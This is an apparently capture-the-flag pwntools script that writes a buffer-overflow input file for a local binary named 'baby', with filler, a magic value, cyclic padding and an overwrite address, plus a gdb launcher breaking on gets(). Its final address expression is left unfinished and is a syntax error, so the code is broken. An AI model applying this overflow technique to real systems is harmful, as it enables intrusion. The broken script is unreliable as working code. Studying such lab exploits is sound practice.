from pwn import *

# Local debugging harness for a binary named "baby" in the working directory:
# it stages a crafted input file (./input) and offers a gdb-backed launcher.
# NOTE(review): the last address expression is unfinished — `^` is not valid
# Python — so this file does not parse as written.

# Target binary, loaded from the current working directory.
elf = ELF(os.getcwd() + "/baby")

# gdb startup commands, used only when start() is run with the GDB argument.
# Breaks on gets(); the commented-out `br *0x5663c4b8` is an earlier
# absolute breakpoint the author kept for reference.
gs = '''
unset env LINES
unset env COLUMNS
set follow-fork-mode child
# br *0x5663c4b8
br gets
continue
'''

def start():
    """Launch the target.

    Returns a gdb-attached tube when the script is invoked with the GDB
    argument (pwntools `args.GDB`), otherwise a plain process.
    """
    if args.GDB:
        return gdb.debug(elf.path, gs)
    else:
        return process([elf.path])

# Interactive launch is currently disabled; the script only writes ./input.
# io = start()
# input("waiting...")

# Base address the final word is computed from; presumably the binary's load
# base (32-bit) — TODO confirm against the debugger's memory mappings.
OFFSET = 0x56555000

# Write the staged input to ./input rather than feeding it to a process.
# Layout (left to right):
#   42 bytes of 'A' filler, two packed 32-bit little-endian values,
#   cyclic padding whose length is the offset of 'caaa' in pwntools'
#   default de Bruijn pattern, then one packed address.
# The meaning of 0xd34db33f is not recoverable from this file.
with open("input", "wb+") as f:
    f.write(b'A'*42
            + p32(1)
            + p32(0xd34db33f)
            + cyclic(cyclic_find('caaa'))
            + p32(OFFSET + ^))  # INCOMPLETE: `^` left by the author; syntax error

# Kept by the author; would need to be `io.interactive()` to run.
# io.interactive